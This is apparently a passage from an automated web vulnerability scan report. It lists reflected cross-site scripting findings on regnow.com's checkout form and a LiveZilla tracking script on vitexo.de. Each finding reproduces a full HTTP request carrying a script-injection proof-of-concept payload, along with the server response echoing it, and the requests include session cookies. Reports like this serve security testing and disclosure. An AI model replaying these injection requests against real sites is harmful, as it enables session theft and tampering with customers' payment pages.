The value of the bill_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 31035<script>alert(1)</script>2b5d3cef309 was submitted in the bill_addr.country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
ail=&bill_addr_confirm_email=&bill_addr.fname=&bill_addr.lname=&bill_addr.company=&bill_addr.phone=&bill_addr.add1=&bill_addr.add2=&bill_addr.city=&bill_addr.state=&bill_addr.zip=&bill_addr.country=US31035<script>alert(1)</script>2b5d3cef309&vat_number=&use_bill_as_ship_addr=1&opt_in_present=&opt_in=1&ship_addr.fname=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:51:39 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 14:51:41 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 14:51:41 GMT
Content-Length: 75428
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'US31035<script>alert(1)</script>2b5d3cef309' is not a valid value</li>
...[SNIP]...

3.169. https://www.regnow.com/checkout/cart/edit [bill_addr.state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the bill_addr.state request parameter is copied into the HTML document as plain text between tags. The payload f7cf3<script>alert(1)</script>6fda55ceb90 was submitted in the bill_addr.state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_addr.email=&bill_addr_confirm_email=&bill_addr.fname=&bill_addr.lname=&bill_addr.company=&bill_addr.phone=&bill_addr.add1=&bill_addr.add2=&bill_addr.city=&bill_addr.state=f7cf3<script>alert(1)</script>6fda55ceb90&bill_addr.zip=&bill_addr.country=US&vat_number=&use_bill_as_ship_addr=1&opt_in_present=&opt_in=1&ship_addr.fname=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:48:16 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 14:48:19 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 14:48:19 GMT
Content-Length: 75540
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'f7cf3<script>alert(1)</script>6fda55ceb90' is not a valid value</li>
...[SNIP]...

3.170. https://www.regnow.com/checkout/cart/edit [cc_exp_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the cc_exp_month request parameter is copied into the HTML document as plain text between tags. The payload e869c<script>alert(1)</script>25983be44dc was submitted in the cc_exp_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
ddr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1e869c<script>alert(1)</script>25983be44dc&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:31:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:31:12 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:31:12 GMT
Content-Length: 75539
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'1e869c<script>alert(1)</script>25983be44dc' is not a valid value</li>
...[SNIP]...

3.171. https://www.regnow.com/checkout/cart/edit [cc_exp_year parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the cc_exp_year request parameter is copied into the HTML document as plain text between tags. The payload e8f2d<script>alert(1)</script>db93a5dd3be was submitted in the cc_exp_year parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011e8f2d<script>alert(1)</script>db93a5dd3be&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:33:12 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:33:14 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:33:14 GMT
Content-Length: 75544
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'2011e8f2d<script>alert(1)</script>db93a5dd3be' is not a valid value</li>
...[SNIP]...

3.172. https://www.regnow.com/checkout/cart/edit [payment_type_def_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the payment_type_def_id request parameter is copied into the HTML document as plain text between tags. The payload 16ef6<script>alert(1)</script>72ff08b81c5 was submitted in the payment_type_def_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
mpany=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC16ef6<script>alert(1)</script>72ff08b81c5&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:24:36 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:24:39 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:24:39 GMT
Content-Length: 74872
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'CC16ef6<script>alert(1)</script>72ff08b81c5' is not a valid value</li>
...[SNIP]...

3.173. https://www.regnow.com/checkout/cart/edit [ship_addr.country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the ship_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 3889e<script>alert(1)</script>733a0108356 was submitted in the ship_addr.country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
ame=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US3889e<script>alert(1)</script>733a0108356&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:21:08 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:21:10 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:21:10 GMT
Content-Length: 75554
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'US3889e<script>alert(1)</script>733a0108356' is not a valid value</li>
...[SNIP]...

3.174. https://www.regnow.com/checkout/cart/edit [ship_addr.state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the ship_addr.state request parameter is copied into the HTML document as plain text between tags. The payload 6705d<script>alert(1)</script>b68c7b1b8a8 was submitted in the ship_addr.state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
pt_in_present=&opt_in=1&ship_addr.fname=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=6705d<script>alert(1)</script>b68c7b1b8a8&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:17:48 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:17:50 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:17:50 GMT
Content-Length: 75572
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'6705d<script>alert(1)</script>b68c7b1b8a8' is not a valid value</li>
...[SNIP]...

3.175. http://www.vitexo.de/support/server.php [browid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vitexo.de
Path:   /support/server.php

Issue detail

The value of the browid request parameter is copied into the HTML document as plain text between tags. The payload 1e7bc<script>alert(1)</script>0d6eddfe6a6 was submitted in the browid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/server.php?request=track&start=1305467989559&browid=aed7c271e7bc<script>alert(1)</script>0d6eddfe6a6&url=aHR0cDovL3d3dy52aXRleG8uZGUv&livezilla=381c574&cd=32&rh=1200&rw=1920&rf=aHR0cDovL3Nob3BzLm9zY29tbWVyY2UuY29tL2RpcmVjdG9yeS9nb3RvLDQzNjg3&tzo=-5&code=&en=&ee=&ec=&geo_lat=LTUyMg==&geo_long=LTUyMg==&geo_region=&geo_city=&geo_tz=&geo_ctryiso=&geo_rid=4&geo_ss=60 HTTP/1.1
Host: www.vitexo.de
Proxy-Connection: keep-alive
Referer: http://www.vitexo.de/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0Ijt9; LOOP_Shop=ad6a5fe7d29f4a372a1cc4c3e53b41b2; __utmz=209196309.1305467958.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,43687; __utma=209196309.299123066.1305467958.1305467958.1305467958.1; __utmc=209196309; __utmb=209196309.1.10.1305467958

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:05:26 GMT
Server: Apache/2.0.59easyTECC/2.0 (Unix) PHP/5.2.1 mod_ssl/2.0.59easyTECC/2.0 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.5
X-Powered-By: PHP/5.2.1
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: livezilla=YToyOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0IjtzOjY6InZpc2l0cyI7aToxO30%3D; expires=Wed, 27-Jul-2011 14:05:26 GMT
Expires: Sun, 15 May 2011 14:05:26 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 126

lz_tracking_set_sessid("381c574","aed7c271e7bc<script>alert(1)</script>0d6eddfe6a6");lz_tracking_callback(30,'1305467989559');

3.176. http://www.vitexo.de/support/server.php [livezilla parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vitexo.de
Path:   /support/server.php

Issue detail

The value of the livezilla request parameter is copied into the HTML document as plain text between tags. The payload ae77c<script>alert(1)</script>4c049e29410 was submitted in the livezilla parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/server.php?request=track&start=1305467989559&browid=aed7c27&url=aHR0cDovL3d3dy52aXRleG8uZGUv&livezilla=381c574ae77c<script>alert(1)</script>4c049e29410&cd=32&rh=1200&rw=1920&rf=aHR0cDovL3Nob3BzLm9zY29tbWVyY2UuY29tL2RpcmVjdG9yeS9nb3RvLDQzNjg3&tzo=-5&code=&en=&ee=&ec=&geo_lat=LTUyMg==&geo_long=LTUyMg==&geo_region=&geo_city=&geo_tz=&geo_ctryiso=&geo_rid=4&geo_ss=60 HTTP/1.1
Host: www.vitexo.de
Proxy-Connection: keep-alive
Referer: http://www.vitexo.de/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0Ijt9; LOOP_Shop=ad6a5fe7d29f4a372a1cc4c3e53b41b2; __utmz=209196309.1305467958.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,43687; __utma=209196309.299123066.1305467958.1305467958.1305467958.1; __utmc=209196309; __utmb=209196309.1.10.1305467958

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:05:41 GMT
Server: Apache/2.0.59easyTECC/2.0 (Unix) PHP/5.2.1 mod_ssl/2.0.59easyTECC/2.0 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.5
X-Powered-By: PHP/5.2.1
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo0ODoiMzgxYzU3NGFlNzdjPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjRjMDQ5ZTI5NDEwIjt9; expires=Wed, 27-Jul-2011 14:05:41 GMT
Set-Cookie: livezilla=YToyOntzOjY6InVzZXJpZCI7czo0ODoiMzgxYzU3NGFlNzdjPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjRjMDQ5ZTI5NDEwIjtzOjY6InZpc2l0cyI7aToxO30%3D; expires=Wed, 27-Jul-2011 14:05:41 GMT
Expires: Sun, 15 May 2011 14:05:41 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 126

lz_tracking_set_sessid("381c574ae77c<script>alert(1)</script>4c049e29410","aed7c27");lz_tracking_callback(30,'1305467989559');

3.177. http://www.vitexo.de/support/server.php [start parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vitexo.de
Path:   /support/server.php

Issue detail

The value of the start request parameter is copied into the HTML document as plain text between tags. The payload f6044<script>alert(1)</script>ca9b4d96ff2 was submitted in the start parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/server.php?request=track&start=1305467989559f6044<script>alert(1)</script>ca9b4d96ff2&browid=aed7c27&url=aHR0cDovL3d3dy52aXRleG8uZGUv&livezilla=381c574&cd=32&rh=1200&rw=1920&rf=aHR0cDovL3Nob3BzLm9zY29tbWVyY2UuY29tL2RpcmVjdG9yeS9nb3RvLDQzNjg3&tzo=-5&code=&en=&ee=&ec=&geo_lat=LTUyMg==&geo_long=LTUyMg==&geo_region=&geo_city=&geo_tz=&geo_ctryiso=&geo_rid=4&geo_ss=60 HTTP/1.1
Host: www.vitexo.de
Proxy-Connection: keep-alive
Referer: http://www.vitexo.de/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0Ijt9; LOOP_Shop=ad6a5fe7d29f4a372a1cc4c3e53b41b2; __utmz=209196309.1305467958.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,43687; __utma=209196309.299123066.1305467958.1305467958.1305467958.1; __utmc=209196309; __utmb=209196309.1.10.1305467958

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:05:18 GMT
Server: Apache/2.0.59easyTECC/2.0 (Unix) PHP/5.2.1 mod_ssl/2.0.59easyTECC/2.0 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.5
X-Powered-By: PHP/5.2.1
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
